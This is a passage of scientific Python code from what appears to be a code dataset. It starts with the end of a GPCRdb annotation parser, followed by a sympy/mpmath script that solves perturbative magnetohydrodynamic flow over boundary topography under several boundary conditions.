line.split('|')[0].strip()\n family = None\n subfamily = None\n \n elif line[4] != ' ':\n \n family = line.strip()\n subfamily = None\n \n elif line[8] != ' ':\n \n subfamily = line.strip()\n \n else:\n \n line = line.strip().strip('\"')\n \n if line.startswith('gpcr'):\n \n line = line.split('\",\"')\n uniprot = line[i_uniprot]\n \n if uniprot:\n \n result[uniprot].add(\n GpcrdbAnnotation(\n gpcr_class = cls,\n family = family,\n subfamily = subfamily,\n )\n )\n \n return dict(result)\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/gpcrdb.py","file_name":"gpcrdb.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"6572518328","text":"from sympy import *\nfrom sympy import E, Eq, Function, pde_separate, Derivative as D, Q\nfrom sympy.vector import CoordSys3D,matrix_to_vector,curl,gradient,divergence,Del,Divergence,Gradient, laplacian,Curl\nfrom sympy.physics.vector import ReferenceFrame, Vector, dynamicsymbols\nfrom sympy.physics.quantum import TensorProduct\nfrom sympy.solvers.solveset import linsolve\nimport matplotlib.pyplot as plt\nfrom sympy.parsing.sympy_parser import parse_expr\nfrom sympy.matrices import matrix_multiply_elementwise\nimport numpy as np\nimport mpmath as mp\nimport params\nmp.mp.dps = params.prec\n\nC = CoordSys3D('C')\n\n#######################\n### FUNCTIONS ###\n#######################\ndef factorial(n):\n if n <= 0:\n return 1\n else:\n return n * factorial(n - 1)\n\n# Taylor approximation at x0 of the function 'function'\ndef taylor_series(function, x0, n, x ):\n i = 0\n p = 0\n while i <= n:\n p = p + (function.diff(x, i).xreplace({x: x0}))/(factorial(i))*(x - x0)**i\n i += 1\n return p\n\n# Convert Sympy Matrix to mpmath array\ndef mpmathM(A):\n B = mp.matrix(A.shape[0],A.shape[1])\n for k in range(A.shape[0]):\n for l in range(A.shape[1]):\n B[k,l] = mp.mpc(str(re(A[k,l])),str(im(A[k,l])))\n return(B)\n\n#Find the null space of the mpmath matrix A\ndef null_space(A, rcond=None):\n u, s, vh = mp.svd_c(A)\n\n M, N = u.rows, vh.cols\n if rcond is None:\n rcond = 10**(-(mp.mp.dps)) * max(M, N)\n tol = np.amax(s) * rcond\n num = np.sum([x > tol for x in s], dtype=int)\n Q = vh[num:,:].transpose_conj()\n\n lo = Q.cols\n pa=0\n while lo != 1:\n if lo > 1:\n rcond = rcond/2\n if lo ==0:\n rcond = rcond*10\n u, s, vh = mp.svd_c(A)\n M, N = u.rows, vh.cols\n tol = np.amax(s) * rcond\n num = np.sum([x > tol for x in s], dtype=int)\n Q = vh[num:,:].transpose_conj()\n lo = Q.cols\n pa = 1\n if pa ==1 :\n print(\"precision issue, warning, rcond = \",rcond)\n\n return(Q)\n\n#Return the Taylor term of exp at order n\ndef taylor(exp,n,dic):\n expt = ((exp.xreplace(dic).doit()).taylor_term(n,e)/e**n)\n return expt\n\n#Create the Matrix from MHD equation\ndef makeMatrix(U,B,p,order,dic,vort =True):\n # if order !=0:\n\n buoy = Ri*(rho*g)\n # else:\n # r1 = rho0\n # buoy = Ri*r1*g\n Cor=((2+chi*y)*qRo*C.k).cross(U)\n BgradB = (AgradB.xreplace({Ax:B&C.i,Ay:B&C.j,Az:B&C.k,Bx:B&C.i,By:B&C.j,Bz:B&C.k})).doit()\n UgradU = (AgradB.xreplace({Ax:U&C.i,Ay:U&C.j,Az:U&C.k,Bx:U&C.i,By:U&C.j,Bz:U&C.k})).doit()\n Eq_NS = diff(U,t)+Cor+UgradU-(-gradient(p)+qRe*laplacian(U)+buoy+BgradB)\n Eq_vort=diff((Eq_NS&C.j),x)-diff((Eq_NS&C.i),y)\n Eq_m=divergence(U)\n Eq_b=diff(B,t)- (qRm*laplacian(B) + curl(U.cross(B)))\n\n if vort == True:\n eq = zeros(7,1)\n for i,j in enumerate([Eq_NS&C.i,Eq_vort,Eq_NS&C.k,Eq_b&C.i,Eq_b&C.j,Eq_b&C.k,Eq_m]):\n eq[i] = taylor(j,order,dic)\n var = 
[Symbol('u'+str(order)+'x'),Symbol('u'+str(order)+'y'),Symbol('u'+str(order)+'z'),Symbol('p'+str(order)),Symbol('b'+str(order)+'x'),Symbol('b'+str(order)+'y'),Symbol('b'+str(order)+'z')]\n M, rme = linear_eq_to_matrix(eq, var)\n M = simplify((M/ansatz)).xreplace(dic)\n\n print(\"Matrix OK\")\n\n return(M,rme,r1)\n\n# Return the solution vectors corresponding to the matrix of the problem\ndef eigen(M,dic,order):\n M1 = M.xreplace(dic)\n with mp.workdps(int(mp.mp.dps*2)):\n M1 = M1.evalf(mp.mp.dps)\n det =(M1).det(method = 'berkowitz')\n detp = Poly(det,kz)\n co = detp.all_coeffs()\n co = [mp.mpc(str(re(k)),str(im(k))) for k in co]\n\n maxsteps = 3000\n extraprec = 500\n ok =0\n while ok == 0:\n try:\n sol,err = mp.polyroots(co,maxsteps =maxsteps,extraprec = extraprec,error =True)\n sol = np.array(sol)\n print(\"Error on polyroots =\", err)\n ok=1\n except:\n maxsteps = int(maxsteps*2)\n extraprec = int(extraprec*1.5)\n print(\"Poly roots fail precision increased: \",maxsteps,extraprec)\n te = np.array([mp.fabs(m) < mp.mpf(10**mp.mp.dps) for m in sol])\n solr = sol[te]\n\n if Bound_nb == 1:\n solr = solr[[mp.im(m) < 0 for m in solr]]\n eigen1 = np.empty((len(solr),np.shape(M1)[0]),dtype = object)\n\n with mp.workdps(int(mp.mp.dps*2)):\n for i in range(len(solr)):\n M2 = mpmathM(M1.xreplace({kz:solr[i]}))\n eigen1[i] = null_space(M2)\n solr1 = solr\n\n div = [mp.fabs(x) for x in (order*kxl.xreplace(dic)*eigen1[:,4]+order*kyl.xreplace(dic)*eigen1[:,5]+solr1*eigen1[:,6])]\n testdivB = [mp.almosteq(x,0,10**(-(mp.mp.dps/2))) for x in div]\n eigen1 =eigen1[testdivB]\n solr1 = solr1[testdivB]\n if len(solr1) == 3:\n print(\"Inviscid semi infinite domain\")\n elif len(solr1) == 6:\n print(\"Inviscid 2 boundaries\")\n elif len(solr1) == 5:\n print(\"Viscous semi infinite domain\")\n elif len(solr1) == 10:\n print(\"Viscous 2 boundaries\")\n else:\n print(\"number of solution inconsistent,\",len(solr1))\n\n return(solr1,eigen1,M1)\n\n\ndef makedic(eig,order):\n dic = {\n Symbol('u'+str(order)+'x'):eig[0],\n Symbol('u'+str(order)+'y'):eig[1],\n Symbol('u'+str(order)+'z'):eig[2],\n Symbol('p'+str(order)):eig[3],\n Symbol('b'+str(order)+'x'):eig[4],\n Symbol('b'+str(order)+'y'):eig[5],\n Symbol('b'+str(order)+'z'):eig[6],\n }\n return(dic)\n\ndef veigen(eig,sol):\n veig=0\n for s in range(len(sol)):\n veig = veig + Symbol('C'+str(s))*eig[s]*ansatz.xreplace({kz:sol[s]})\n veig = veig/ansatz\n\n return(veig)\n\n#Surface condition of the 1st boundary\ndef surfcond(val,dic,realtopo =True ):\n if realtopo==True:\n va = val.xreplace(dic).doit().xreplace({kz:mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0.xreplace(dic):-(f-f0)}).xreplace(dic)\n else:\n va = val.xreplace(dic).doit().xreplace({kz:mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0.xreplace(dic):(-(f-f0)-conjugate(f-f0))/2}).xreplace(dic)\n return(va)\n\n#Surface condition of the 2nd boundary\ndef surfcond_2(val,dic,realtopo =True ):\n if realtopo==True:\n va = val.xreplace(dic).doit().xreplace({kz:-mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0_2.xreplace(dic):-(f_2-f0_2)}).xreplace(dic)\n else:\n va = val.xreplace(dic).doit().xreplace({kz:-mp.sqrt(-(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dic)),f0_2.xreplace(dic):(-(f_2-f0_2)-conjugate(f_2-f0_2))/2}).xreplace(dic)\n return(va)\n\n#Calculate tangential pressure stress\ndef pressure(p,n,dic,order):\n p= (p+conjugate(p))/2\n nz = (n&C.i)\n nre = ((nz+conjugate(nz))/2)\n nre = (series(nz,e,0,order+1).removeO())\n Fp = 
((p*nre)).xreplace({conjugate(x):x,conjugate(y):y,conjugate(z):z})\n #~ Fp = surfcond(Fp,dic,realtopo=True)\n Fp = Fp.xreplace({z:topo_sum})\n Fptay = (taylor_series(Fp,0,(order*2),e)).xreplace({e:zeta}).xreplace(dic)\n # Sympy implemented series\n #~ Fptay = (series(Fp,e,0,(order*2+1)).removeO()).xreplace({e:zeta}).xreplace(dic)\n FFp = lambdify((x,y),Fptay,'mpmath')\n avFp= mp.quad(FFp, [-mp.pi, mp.pi],[-mp.pi, mp.pi],maxdegree =10)\n avFp = avFp/(4*mp.pi**2)\n return(avFp)\n\n#Calculate the strain tensor\ndef strain(U):\n xy = 1/2*(diff(U&C.i,y)+diff(U&C.j,x))\n xz = 1/2*(diff(U&C.i,z)+diff(U&C.k,x))\n yz = 1/2*(diff(U&C.j,z)+diff(U&C.k,y))\n strainT = Matrix([[diff(U&C.i,x),xy,xz],\n [xy,diff(U&C.j,y),yz],\n [xz,yz,diff(U&C.k,z)]])\n return(strainT)\n\ndef Bound(U,B,sol,eig,dic,order,condB = \"harm pot\",condU = 'Inviscid'):\n lso = len(sol)\n for s in range(len(sol)):\n globals() ['C'+str(s)] = Symbol('C'+str(s))\n #################################\n ### Inviscid solution : ###\n ### lso=3 --> 1 boundary ###\n ### lso=6 --> 2 boundaries ###\n #################################\n nn = n.xreplace(dic).doit()\n U = (U.xreplace(makedic(veigen(eig,sol),order))).xreplace({U0:1})\n B = (B.xreplace(makedic(veigen(eig,sol),order)))\n if (condB == \"harm pot\"):\n bchx,bchy,bchz = symbols(\"bchx,bchy,bchz\")\n bcc =surfcond((bchx*C.i +bchy*C.j + bchz*C.k)*ansatz - gradient(psi),dic).doit()\n sob = list(linsolve([bcc&C.i,bcc&C.j,bcc&C.k],(bchx,bchy,bchz)))[0]\n bbc = sob[0]*C.i + sob[1]*C.j + sob[2]*C.k\n bb = B.xreplace(makedic(veigen(eig,sol),order)) - (bbc*ansatz)\n Eq_b= surfcond(bb,dic)\n Eq_bx = Eq_b&C.i; Eq_by = Eq_b&C.j; Eq_bz = Eq_b&C.k\n if params.Bound_nb ==2:\n bchx2,bchy2,bchz2 = symbols(\"bchx2,bchy2,bchz2\")\n bcc2 =surfcond_2((bchx2*C.i +bchy2*C.j +bchz2*C.k)*ansatz - gradient(psi_2b),dic)\n sob2 = list(linsolve([bcc2&C.i,bcc2&C.j,bcc2&C.k],(bchx2,bchy2,bchz2)))[0]\n bbc2 = sob2[0]*C.i + sob2[1]*C.j + sob2[2]*C.k\n bb2 = B.xreplace(makedic(veigen(eig,sol),order)) - (bbc2*ansatz)\n Eq_b2= surfcond_2(bb2,dic)\n Eq_b2x = Eq_b2&C.i; Eq_b2y = Eq_b2&C.j; Eq_b2z = Eq_b2&C.k\n if (condB == \"thick\"):\n bchx,bchy,bchz,eta = symbols(\"bchx,bchy,bchz,eta\")\n kz_t = -sqrt(-kxl**2-kyl**2-I*omega/qRmm)\n # kz_t = I*1e12\n B_mant = (bchx*C.i +bchy*C.j + bchz*C.k)*ansatz.xreplace({kz:kz_t})\n\n\n eq_ind = (surfcond((diff(B_mant,t)-qRmm*laplacian(B_mant)-diff(B,t) +qRm*laplacian(B) - curl(U.cross(B))).xreplace({kz:kz_t}),dic).xreplace(dic))\n eq_E = (qRm*curl(B)-U.cross(B)-qRmm*curl(B_mant))\n eq_Et = surfcond(((nn).cross(eq_E)).xreplace({kz:kz_t}),dic)\n\n\n\n\n eq_B = surfcond(((B_mant.dot(nn)-B.dot(nn))).xreplace({kz:kz_t}),dic)\n\n un = (U.dot(nn))\n Eq_n1= surfcond((un).xreplace({kz:kz_t}),dic).xreplace(dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,eq_ind&C.i,eq_ind&C.j,eq_ind&C.k,eq_Et.dot(tx),eq_Et.dot(ty)]]\n\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,bchx,bchy,bchz))\n\n\n\n\n U = (U.xreplace(makedic(veigen(eig,sol),order))).xreplace({U0:1})\n un = U.dot(nn)\n Eq_n1= surfcond(un,dic).xreplace(dic)\n\n if condU == \"Inviscid\":\n if params.Bound_nb ==2:\n nn2 = n2.xreplace(dic).doit()\n un2 = U.dot(nn2)\n Eq_n2= surfcond_2(un2,dic)\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n elif params.Bound_nb ==1:\n TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) 
for eq in [Eq_n1,Eq_bx,Eq_by,Eq_bz]]\n            Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,Symbol(\"psi\"+str(order))))\n\n    elif condU == 'noslip':\n        if params.Bound_nb ==1:\n            U = (U.xreplace(makedic(veigen(eig,sol),order)))\n            ut1 = U.dot(tx)\n            ut2 = U.dot(ty)\n            Eq_BU1 = surfcond(ut1,dic)\n            Eq_BU2 = surfcond(ut2,dic)\n            TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_BU1,Eq_BU2,Eq_bx,Eq_by,Eq_bz]]\n            Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,Symbol(\"psi\"+str(order))))\n        elif params.Bound_nb ==2:\n            un1 = U.dot(tx2)\n            un2 = U.dot(ty2)\n            Eq2_BU1 = surfcond_2(un1,dic)\n            Eq2_BU2 = surfcond_2(un2,dic)\n            TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_BU1,Eq_BU2,Eq2_BU1,Eq2_BU2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n            Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n\n    elif condU == 'stressfree':\n        if params.Bound_nb ==1:\n            eu = strain(U)*nn\n            eu1 = eu*tx\n            eu2 = eu*ty\n            Eq_BU1 = surfcond(eu1,dic,realtopo =False)\n            Eq_BU2 = surfcond(eu2,dic,realtopo =False)\n            TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_BU1,Eq_BU2,Eq_bx,Eq_by,Eq_bz]]\n            Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,Symbol(\"psi\"+str(order))))\n        elif params.Bound_nb ==2:\n            eu = strain(U)*nn2\n            eu1 = eu*tx2\n            eu2 = eu*ty2\n            # the second-boundary helper is surfcond_2 (surfcond2 was undefined)\n            Eq2_BU1 = surfcond_2(eu1,dic,realtopo =False)\n            Eq2_BU2 = surfcond_2(eu2,dic,realtopo =False)\n            TEq = [(taylor(eq,order,dic)).xreplace({x:0,y:0,t:0}) for eq in [Eq_n1,Eq_n2,Eq_BU1,Eq_BU2,Eq2_BU1,Eq2_BU2,Eq_bx,Eq_by,Eq_bz,Eq_b2x,Eq_b2y,Eq_b2z]]\n            Mat, res = linear_eq_to_matrix(TEq,(C0,C1,C2,C3,C4,C5,C6,C7,C8,C9,Symbol(\"psi\"+str(order)),Symbol(\"psi\"+str(order)+\"_2b\")))\n\n    Mat = Mat.evalf(mp.mp.dps)\n    res = res.evalf(mp.mp.dps)\n    Mat = mpmathM(Mat)\n    res = mpmathM(res)\n    try:\n        abc = mp.qr_solve(Mat,res)[0]\n    except Exception:\n        # QR can fail on ill-conditioned boundary systems; fall back to LU\n        abc = mp.lu_solve(Mat,res)\n\n    mantle =0 #In progress ...\n    solans = zeros(7,1)\n    for l in range(lso):\n        solans = solans + abc[l]*Matrix(eig[l])*(ansatz).xreplace({kz:sol[l]})\n    solans = solans.xreplace(dic)\n\n    return(abc,solans,mantle)\n\n# Create the variable with perturbative notation\ndef makeVar():\n    if i > 1:\n        lon = len(eigens)\n        uu = zeros(3,1);bb = zeros(3,1)\n    U = U0 *u0 + e**i*(Symbol('u'+str(i)+'x')*C.i + Symbol('u'+str(i)+'y')*C.j + Symbol('u'+str(i)+'z')*C.k)*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n    for h in range(1,i):\n        for l in range(1,lon+1):\n            uu = uu + e**h*(Matrix(eigens[l-1,:3,h-1]*ansatz0).xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n        U = U + (uu[0]*C.i + uu[1]*C.j + uu[2]*C.k)+e**h*(Uparts[h])\n\n    B = qAl*b0 + e**i*(Symbol('b'+str(i)+'x')*C.i + Symbol('b'+str(i)+'y')*C.j + Symbol('b'+str(i)+'z')*C.k)*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n    for h in range(1,i):\n        for l in range(1,lon+1):\n            bb = bb + e**h*(Matrix(eigens[l-1,4:,h-1]*ansatz0).xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n        B = B + (bb[0]*C.i + bb[1]*C.j + bb[2]*C.k)+e**h*Bparts[h]\n\n    p = p0 + e**i*Symbol('p'+str(i))*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n    for h in range(1,i):\n        for l in range(1,lon+1):\n            p = p + e**h*(eigens[l-1,3,h-1]*ansatz0.xreplace({kz:Symbol(\"k\" +str(h)+\"_\"+str(l))}).xreplace({kxl:h*kxl,kyl:h*kyl,omega:h*omega}))\n        p = p + e**h*pparts[h]\n\n    psi = psi0 + e**i*Symbol('psi'+str(i))*ansatz0.xreplace({kz:sqrt(-i*(kxl**2+kyl**2).xreplace(dico0),evaluate = 
False)})\n    for h in range(1,i):\n        psi = psi + e**h*psis[h]*ansatz0.xreplace({kz:sqrt(-h*(kxl**2+kyl**2).xreplace(dico0),evaluate = False)})\n\n    if Bound_nb ==2:\n        psi_2b = psi0_2b + (e**i*Symbol('psi'+str(i)+\"_2b\")*ansatz0.xreplace({kz:-sqrt(mp.mpf(str(-i*(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dico0))),evaluate =False)})).xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n        for h in range(1,i):\n            psi_2b = psi_2b + e**h*psis_2b[h]*ansatz0.xreplace({kz:-sqrt(mp.mpf(str(-h*(kxl**mp.mpf(2)+kyl**mp.mpf(2)).xreplace(dico0))),evaluate =False),kxl:h*kxl,kyl:h*kyl})\n\n    if Bound_nb ==2:\n        return(U,B,p,psi,psi_2b)\n    if Bound_nb ==1:\n        return(U,B,p,psi)\n\ndef subs_k(ex2,i,bnd):\n    for o in range(0,i):\n        for l in range(0,len(eigens)):\n            ex2 = ex2.xreplace({Symbol(\"k\" +str(o+1)+\"_\"+ str(l+1)):solk[l,o]})\n    return(ex2)\n\n\n#########################\n### Variables ###\n#########################\n\norder = params.order\nBound_nb = params.Bound_nb\n\nx = C.x\ny = C.y\nz = C.z\n\nde = Del()\ne,Dist = symbols(\"e,Dist\",real = True)\nRi, Ro, Al, Rm, omega, t, kx,ky,kxl,kyl, kz,rho_r,alpha, g = symbols(\"Ri Ro Al Rm omega t kx,ky,kxl,kyl,kz,rho_r,alpha, g\")\n# the symbol names now match the targets on the left (the last entry was \"gv\")\nzeta,g0,g1,buoy,a,b,c,dv,ev,fv = symbols(\"zeta,g0,g1,buoy,a,b,c,dv,ev,fv\")\nBOx,BOy,BOz = symbols(\"BOx,BOy,BOz\")\npsi0 = symbols(\"psi0\")\npsi0_2b = symbols(\"psi0_2b\")\nfor i in ['u','b']:\n    for j in ['x','y','z']:\n        globals()[i +'1'+j] = Symbol(i +'1'+j)\np0 = Symbol(\"p0\")\nb0x = Function(\"b0x\")(x,y,z,t);b0y = Function(\"b0y\")(x,y,z,t)\nb0z = Function(\"b0z\")(x,y,z,t);u0x = Function(\"u0x\")(x,y,z,t)\nu0y = Function(\"u0y\")(x,y,z,t);u0z = Function(\"u0z\")(x,y,z,t)\nf0 = Function(\"f0\")(x,y,z,t);f1 = Function(\"f1\")(x,y,z,t)\nf2 = Function(\"f2\")(x,y,z,t);rho0 = Function(\"rho0\")(x,y,z,t)\nf0_2 = Function(\"f0_2\")(x,y,z,t);f1_2 = Function(\"f1_2\")(x,y,z,t)\nf2_2 = Function(\"f2_2\")(x,y,z,t)\ng1 = Symbol(\"g1\");Ax = Function(\"Ax\")(x,y,z,t)\nAy = Function(\"Ay\")(x,y,z,t);Az = Function(\"Az\")(x,y,z,t)\nBx = Function(\"Bx\")(x,y,z,t);By = Function(\"By\")(x,y,z,t)\nBz = Function(\"Bz\")(x,y,z,t)\nAgradB =((Ax*D(Bx,x)+Ay*D(Bx,y)+Az*D(Bx,z))*C.i+\n(Ax*D(By,x)+Ay*D(By,y)+Az*D(By,z))*C.j\n+(Ax*D(Bz,x)+Ay*D(Bz,y)+Az*D(Bz,z))*C.k)\n\nU0,qRm,qRe,qRo,qFr,chi,qAl,qRmm = symbols(\"U0,qRm,qRe,qRo,qFr,chi,qAl,qRmm\",real = True)\n\nu0 = u0x*C.i + u0y*C.j + u0z*C.k\nb0 = b0x*C.i + b0y*C.j + b0z*C.k\n\nansatz0=exp(I*(omega*t+kxl*x+kyl*y+kz*z))\ng = -g0*C.k\nf = f0 + e*f1 #+ f2*e**2 Uncomment for smaller scales of topography\n\n# Vector normal and tangential to the topography\ndelf = de(f)\nnfo= delf/sqrt((delf&C.i)**2+(delf&C.j)**2+(delf&C.k)**2)\nnx = (nfo&C.i)\nny = (nfo&C.j)\nnz = (nfo&C.k)\n\ntfox= (C.i)+((ny/nx)*C.j)+(-((nx**2+ny**2)/(nx*nz))*C.k)\ntfox = tfox/sqrt((tfox&C.i)**2+(tfox&C.j)**2+(tfox&C.k)**2)\ntfoy= (-(ny/nx)*C.i)+(C.j)+(0*C.k)\ntfoy = tfoy/sqrt((tfoy&C.i)**2+(tfoy&C.j)**2+(tfoy&C.k)**2)\nif Bound_nb == 2:\n    f_2 = f0_2 + Dist + e*f1_2\n    delf2 = de(f_2)\n    nfo2= -delf2/sqrt((delf2&C.i)**2+(delf2&C.j)**2+(delf2&C.k)**2)\n    tfox2= ((-(delf2&C.j)*C.i)+((delf2&C.i)*C.j)+(0*C.k))\n    # normalise the second-boundary tangents themselves (this block previously\n    # renormalised the first-boundary tfox/tfoy by mistake)\n    tfox2 = tfox2/sqrt((tfox2&C.i)**2+(tfox2&C.j)**2+(tfox2&C.k)**2)\n    # the last component must be along C.k for tfoy2 to be orthogonal to the normal\n    tfoy2= (((delf2&C.i)*C.i)+((delf2&C.j)*C.j)+(-(((delf2&C.i)**2+(delf2&C.j)**2)/(delf2&C.k))*C.k))\n    tfoy2 = tfoy2/sqrt((tfoy2&C.i)**2+(tfoy2&C.j)**2+(tfoy2&C.k)**2)\n\n\n######################\n### SCRIPT ###\n######################\n#Parameters chosen for calculation\ndico0 = params.dom\ndico1 = params.dom1\n# if dico1['qRe'] != 0 and condU =='Inviscid':\n#     print(\"error Inviscid fluid 
incompatible with qRe != 0\")\nprint(dico1)\n\nlenvar = 1\nPress = np.zeros((4,lenvar), dtype = complex)  # np.complex was removed from NumPy; use the builtin\n\n#Choose what parameter you want to vary\nfor K,eta in enumerate(mp.linspace(-1,4,lenvar)):\n    saveO = zeros(7,1) # save variable for speed, pressure and magnetic field (7 scalars)\n    saveO_m = 0*C.i # magnetic field for the mantle part\n    KXs = params.KXs\n    KYs = params.KYs\n\n    # Create the total topography and its normal vector\n    topo_sum =0\n    for kxx,kyy in zip(KXs,KYs):\n        topo_sum += e*(zeta*(exp(I*(kxx*x+kyy*y))))/len(KXs)\n    delfsum = de(z-topo_sum)\n    nsum = delfsum/sqrt((delfsum&C.i)**2+(delfsum&C.j)**2+(delfsum&C.k)**2)\n    nsum = nsum.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n\n    # Calculus for each Fourier component of the topography\n    for KX,KY in zip(KXs,KYs):\n        Usopart = 0\n        solfull = 0\n        so_part = zeros(7,1)\n        psis = [0]\n        psis_2b = [0]\n        rhos = [0]\n        Uparts = [0*C.i +0*C.j +0*C.k]\n        Bparts = [0*C.i +0*C.j +0*C.k]\n        pparts = [0]\n        Usopart = 0*C.i +0*C.j +0*C.k\n        Bsopart=0*C.i +0*C.j +0*C.k\n        psopart = 0\n        dico0[kyl] = KY # y wavenumber\n        dico0[kxl] = KX # x wavenumber\n\n        n = nfo.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # normal vector\n        tx = tfox.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # 1st tangential vector\n        ty = tfoy.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1}) # 2nd tangential vector\n\n        # same for the 2nd boundary\n        if Bound_nb == 2:\n            n2 = nfo2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n            tx2 = tfox2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n            ty2 = tfoy2.xreplace({**dico0,**dico1}).doit().xreplace({**dico0,**dico1})\n\n        # Calculus for each order i\n        for i in range(1,order+1):\n            print(\"ORDER\",i)\n\n            if Bound_nb ==2:\n                U,B,p,psi,psi_2b = makeVar()\n            if Bound_nb ==1:\n                U,B,p,psi = makeVar()\n\n            # Solve the mass conservation equation\n            if i ==1:\n                rho = rho0.xreplace({**dico0,**dico1})\n            rho = rho + e**i*Symbol('rho'+str(i))*ansatz0.xreplace({kxl:i*kxl,kyl:i*kyl,omega:i*omega})\n            print(rho)\n            Eq_rho = diff(rho,t)+ U.dot(gradient(rho))\n            print(Eq_rho)\n            Eq_rho1 = taylor(Eq_rho,i,{**dico0,**dico1})\n            print(Eq_rho1)\n            r1 = list(solveset(Eq_rho1,Symbol('rho'+str(i))))[0]\n            rho = rho.xreplace({Symbol('rho'+str(i)):r1})\n\n            ansatz = (exp(I*(i*omega*t+i*kxl*x+i*kyl*y+kz*z))).xreplace({**dico0,**dico1})\n\n            ### TEST OF ORDER0 ###\n            # print(\"we test the order 0...\")\n            # M0,rme0,r10 = makeMatrix(U0 *u0,qAl*b0,p0,0,{**dico0,**dico1},vort=True)\n            # print(rme0.xreplace({**dico0,**dico1}))\n\n            M,rme,r1 = makeMatrix(U,B,p,i,{**dico0,**dico1},vort=True)\n            M = M.xreplace({y:0})\n\n            if i > 1:\n                print(\"Particular solution\")\n                rmec = expand(rme)\n\n                s= (expand(rmec[0])).args\n\n                expo = []\n                for st in s:\n                    stt = str(st)\n                    start = stt.find('exp')\n                    expo = np.append(expo,stt[start:])\n                expo = np.unique(expo)\n                so_part = zeros(7,1)\n                for ex in expo:\n                    print(ex)\n                    loc_dict = {'C':C}\n                    ex = parse_expr(ex,local_dict = loc_dict)\n\n                    coe = lambda x: x.coeff(ex)\n\n                    rmep = (rmec).applyfunc(coe)\n                    nwkz = simplify((log(ex).expand(force=True)/I).xreplace({x:0,y:0,t:0,z:1}))\n                    Mp = simplify(M.xreplace({kz:nwkz}))\n\n                    rmep = subs_k(rmep,i,Bound_nb)\n                    Mp = subs_k(Mp,i,Bound_nb)\n                    with mp.workdps(int(mp.mp.dps*2)):\n\n                        Mp = mpmathM(Mp)\n                        rmep = mpmathM(rmep)\n\n                        try:\n                            soluchap = mp.qr_solve(Mp,rmep)[0]\n                        except Exception:\n                            soluchap = mp.lu_solve(Mp,rmep)\n                            print('QR decomposition failed; LU used')\n\n                    sop = Matrix(soluchap)*ex\n                    so_part = so_part+sop\n\n\n            with 
mp.workdps(int(mp.mp.dps*2)):\n so_part = so_part.xreplace({**dico0,**dico1})\n Usopart = so_part[0]*C.i + so_part[1]*C.j + so_part[2]*C.k\n Bsopart = so_part[4]*C.i + so_part[5]*C.j + so_part[6]*C.k\n psopart = so_part[3]\n\n Ubnd = U + e**i*Usopart\n Bbnd = B + e**i*Bsopart\n pbnd = p + e**i*psopart\n\n Ubnd = subs_k(Ubnd,i,Bound_nb)\n Bbnd = subs_k(Bbnd,i,Bound_nb)\n pbnd = subs_k(pbnd,i,Bound_nb)\n\n ###### Homogeneous solution #######\n\n print(\"Homogeneous solution\")\n\n\n\n sol,eig,M1 = eigen(M,{**dico0,**dico1},i)\n #~ print(sol)\n if i == 1:\n Ubnd = U\n Bbnd = B\n eigens= np.zeros((len(sol),7,order),dtype = object)\n solk= np.zeros((len(sol),order),dtype = object)\n # print(\"res Eigens\")\n # for s in range(len(eig)):\n # print(max(np.array(M.xreplace({kz:sol[s]}).dot(eig[s]),dtype = np.complex)))\n abc,solhom,mantle = Bound(Ubnd,Bbnd,sol,eig,{**dico0,**dico1},i)\n\n for ei in range(len(sol)):\n eigens[ei,:,i-1] = abc[ei] * eig[ei]\n solk[:,i-1] = sol\n if Bound_nb == 1:\n psis.append(abc[-1])\n if Bound_nb ==2:\n psis.append(abc[-2])\n psis_2b.append(abc[-1])\n\n\n\n\n Uparts.append(Usopart)\n Bparts.append(Bsopart)\n pparts.append(psopart)\n solfull = so_part +solhom\n\n print(\"Finish\")\n #######################\n ### Final fields ###\n #######################\n save = solfull\n save = 